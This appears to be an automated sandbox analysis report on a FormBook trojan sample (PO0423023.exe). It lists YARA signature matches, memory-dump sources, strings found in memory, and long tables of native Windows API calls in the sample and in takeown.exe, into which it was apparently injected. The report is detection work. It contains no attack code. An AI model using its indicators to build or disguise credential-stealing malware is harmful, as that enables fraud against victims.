Source: takeown.exe, 00000006.00000002.3263652548.0000000004656000.00000004.10000000.00040000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003A86000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop
Source: takeown.exe, 00000006.00000002.3263652548.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000006.00000002.3265854734.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com
Source: takeown.exe, 00000006.00000002.3263652548.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, takeown.exe, 00000006.00000002.3265854734.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com/domain/search-domains?query=cd14j.us
Source: uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003C18000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3263133783.0000000003DAA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.tucowsdomains.com/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.PO0423023.exe.24942b8.1.raw.unpack, HomeView.cs	Large array initialization: : array initializer size 33604
Source: 0.2.PO0423023.exe.4ce0000.10.raw.unpack, HomeView.cs	Large array initialization: : array initializer size 33604

Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0042B263 NtClose,	3_2_0042B263
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02B60 NtClose,LdrInitializeThunk,	3_2_01A02B60
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01A02DF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01A02C70
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A035C0 NtCreateMutant,LdrInitializeThunk,	3_2_01A035C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A04340 NtSetContextThread,	3_2_01A04340
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A04650 NtSuspendThread,	3_2_01A04650
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02BA0 NtEnumerateValueKey,	3_2_01A02BA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02B80 NtQueryInformationFile,	3_2_01A02B80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02BE0 NtQueryValueKey,	3_2_01A02BE0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02BF0 NtAllocateVirtualMemory,	3_2_01A02BF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02AB0 NtWaitForSingleObject,	3_2_01A02AB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02AF0 NtWriteFile,	3_2_01A02AF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02AD0 NtReadFile,	3_2_01A02AD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02DB0 NtEnumerateKey,	3_2_01A02DB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02DD0 NtDelayExecution,	3_2_01A02DD0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02D30 NtUnmapViewOfSection,	3_2_01A02D30
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02D00 NtSetInformationFile,	3_2_01A02D00
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02D10 NtMapViewOfSection,	3_2_01A02D10
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02CA0 NtQueryInformationToken,	3_2_01A02CA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02CF0 NtOpenProcess,	3_2_01A02CF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02CC0 NtQueryVirtualMemory,	3_2_01A02CC0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02C00 NtQueryInformationProcess,	3_2_01A02C00
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02C60 NtCreateKey,	3_2_01A02C60
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02FA0 NtQuerySection,	3_2_01A02FA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02FB0 NtResumeThread,	3_2_01A02FB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02F90 NtProtectVirtualMemory,	3_2_01A02F90
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02FE0 NtCreateFile,	3_2_01A02FE0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02F30 NtCreateSection,	3_2_01A02F30
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02F60 NtCreateProcessEx,	3_2_01A02F60
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02EA0 NtAdjustPrivilegesToken,	3_2_01A02EA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02E80 NtReadVirtualMemory,	3_2_01A02E80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02EE0 NtQueueApcThread,	3_2_01A02EE0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A02E30 NtWriteVirtualMemory,	3_2_01A02E30
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A03090 NtSetValueKey,	3_2_01A03090
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A03010 NtOpenDirectoryObject,	3_2_01A03010
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A039B0 NtGetContextThread,	3_2_01A039B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A03D10 NtOpenProcessToken,	3_2_01A03D10
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A03D70 NtOpenThread,	3_2_01A03D70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE4340 NtSetContextThread,LdrInitializeThunk,	6_2_03AE4340
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE4650 NtSuspendThread,LdrInitializeThunk,	6_2_03AE4650
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_03AE2BA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_03AE2BE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03AE2BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2B60 NtClose,LdrInitializeThunk,	6_2_03AE2B60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2AF0 NtWriteFile,LdrInitializeThunk,	6_2_03AE2AF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2AD0 NtReadFile,LdrInitializeThunk,	6_2_03AE2AD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2FB0 NtResumeThread,LdrInitializeThunk,	6_2_03AE2FB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2FE0 NtCreateFile,LdrInitializeThunk,	6_2_03AE2FE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2F30 NtCreateSection,LdrInitializeThunk,	6_2_03AE2F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03AE2E80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_03AE2EE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03AE2DF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03AE2DD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03AE2D30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03AE2D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03AE2CA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2C60 NtCreateKey,LdrInitializeThunk,	6_2_03AE2C60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03AE2C70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE35C0 NtCreateMutant,LdrInitializeThunk,	6_2_03AE35C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE39B0 NtGetContextThread,LdrInitializeThunk,	6_2_03AE39B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2B80 NtQueryInformationFile,	6_2_03AE2B80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2AB0 NtWaitForSingleObject,	6_2_03AE2AB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2FA0 NtQuerySection,	6_2_03AE2FA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2F90 NtProtectVirtualMemory,	6_2_03AE2F90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2F60 NtCreateProcessEx,	6_2_03AE2F60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2EA0 NtAdjustPrivilegesToken,	6_2_03AE2EA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2E30 NtWriteVirtualMemory,	6_2_03AE2E30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2DB0 NtEnumerateKey,	6_2_03AE2DB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2D00 NtSetInformationFile,	6_2_03AE2D00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2CF0 NtOpenProcess,	6_2_03AE2CF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2CC0 NtQueryVirtualMemory,	6_2_03AE2CC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE2C00 NtQueryInformationProcess,	6_2_03AE2C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE3090 NtSetValueKey,	6_2_03AE3090
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE3010 NtOpenDirectoryObject,	6_2_03AE3010
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE3D10 NtOpenProcessToken,	6_2_03AE3D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE3D70 NtOpenThread,	6_2_03AE3D70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03307BB0 NtDeleteFile,	6_2_03307BB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03307AD0 NtReadFile,	6_2_03307AD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03307970 NtCreateFile,	6_2_03307970
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03307DA0 NtAllocateVirtualMemory,	6_2_03307DA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03307C50 NtClose,	6_2_03307C50

Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_00BBD5DC	0_2_00BBD5DC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_044D1400	0_2_044D1400
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09488048	0_2_09488048
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948C978	0_2_0948C978
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09480B90	0_2_09480B90
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09480BA0	0_2_09480BA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948CDA0	0_2_0948CDA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948CDB0	0_2_0948CDB0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948AE98	0_2_0948AE98
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948D1E8	0_2_0948D1E8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_094822C0	0_2_094822C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_0948B2D0	0_2_0948B2D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_09484298	0_2_09484298
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_094842A8	0_2_094842A8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 0_2_094822B0	0_2_094822B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040E04A	3_2_0040E04A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040E053	3_2_0040E053
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401114	3_2_00401114
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00402920	3_2_00402920
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401120	3_2_00401120
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401280	3_2_00401280
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00403388	3_2_00403388
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00403390	3_2_00403390
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00401570	3_2_00401570
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040FDAA	3_2_0040FDAA
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040FDB3	3_2_0040FDB3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00402640	3_2_00402640
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0042D653	3_2_0042D653
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_00416703	3_2_00416703
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_0040FFD3	3_2_0040FFD3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A901AA	3_2_01A901AA
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A841A2	3_2_01A841A2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A881CC	3_2_01A881CC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0100	3_2_019C0100
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6A118	3_2_01A6A118
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A58158	3_2_01A58158
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A903E6	3_2_01A903E6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE3F0	3_2_019DE3F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8A352	3_2_01A8A352
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A502C0	3_2_01A502C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70274	3_2_01A70274
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A90591	3_2_01A90591
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0535	3_2_019D0535
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7E4F6	3_2_01A7E4F6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A74420	3_2_01A74420
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A82446	3_2_01A82446
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CC7C0	3_2_019CC7C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F4750	3_2_019F4750
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0770	3_2_019D0770
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EC6E0	3_2_019EC6E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A9A9A6	3_2_01A9A9A6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D29A0	3_2_019D29A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E6962	3_2_019E6962
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B68B8	3_2_019B68B8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FE8F0	3_2_019FE8F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DA840	3_2_019DA840
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D2840	3_2_019D2840
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A86BD7	3_2_01A86BD7
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8AB40	3_2_01A8AB40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CEA80	3_2_019CEA80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E8DBF	3_2_019E8DBF
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CADE0	3_2_019CADE0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DAD00	3_2_019DAD00
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6CD1F	3_2_01A6CD1F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A70CB5	3_2_01A70CB5
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C0CF2	3_2_019C0CF2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0C00	3_2_019D0C00
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4EFA0	3_2_01A4EFA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C2FC8	3_2_019C2FC8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DCFE0	3_2_019DCFE0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A12F28	3_2_01A12F28
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A72F30	3_2_01A72F30
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F0F30	3_2_019F0F30
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A44F40	3_2_01A44F40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E2E90	3_2_019E2E90
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8CE93	3_2_01A8CE93
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8EEDB	3_2_01A8EEDB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8EE26	3_2_01A8EE26
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D0E59	3_2_019D0E59
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DB1B0	3_2_019DB1B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A9B16B	3_2_01A9B16B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A0516C	3_2_01A0516C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BF172	3_2_019BF172
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A870E9	3_2_01A870E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8F0E0	3_2_01A8F0E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D70C0	3_2_019D70C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7F0CC	3_2_01A7F0CC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A1739A	3_2_01A1739A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8132D	3_2_01A8132D
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BD34C	3_2_019BD34C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D52A0	3_2_019D52A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A712ED	3_2_01A712ED
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EB2C0	3_2_019EB2C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6D5B0	3_2_01A6D5B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A995C3	3_2_01A995C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A87571	3_2_01A87571
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8F43F	3_2_01A8F43F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C1460	3_2_019C1460
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8F7B0	3_2_01A8F7B0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A816CC	3_2_01A816CC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A15630	3_2_01A15630
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A65910	3_2_01A65910
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D9950	3_2_019D9950
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EB950	3_2_019EB950
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D38E0	3_2_019D38E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3D800	3_2_01A3D800
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EFB80	3_2_019EFB80
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A45BF0	3_2_01A45BF0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A0DBF9	3_2_01A0DBF9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8FB76	3_2_01A8FB76
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A15AA0	3_2_01A15AA0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A71AA3	3_2_01A71AA3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6DAAC	3_2_01A6DAAC
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7DAC6	3_2_01A7DAC6
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A43A6C	3_2_01A43A6C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8FA49	3_2_01A8FA49
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A87A46	3_2_01A87A46
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EFDC0	3_2_019EFDC0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A87D73	3_2_01A87D73
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D3D40	3_2_019D3D40
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A81D5A	3_2_01A81D5A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8FCF2	3_2_01A8FCF2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A49C32	3_2_01A49C32
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D1F92	3_2_019D1F92
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8FFB1	3_2_01A8FFB1
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01993FD2	3_2_01993FD2
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01993FD5	3_2_01993FD5
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A8FF09	3_2_01A8FF09
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D9EB0	3_2_019D9EB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B703E6	6_2_03B703E6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ABE3F0	6_2_03ABE3F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6A352	6_2_03B6A352
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B302C0	6_2_03B302C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B50274	6_2_03B50274
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B641A2	6_2_03B641A2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B701AA	6_2_03B701AA
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B681CC	6_2_03B681CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AA0100	6_2_03AA0100
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B4A118	6_2_03B4A118
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B38158	6_2_03B38158
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B42000	6_2_03B42000
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AAC7C0	6_2_03AAC7C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB0770	6_2_03AB0770
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AD4750	6_2_03AD4750
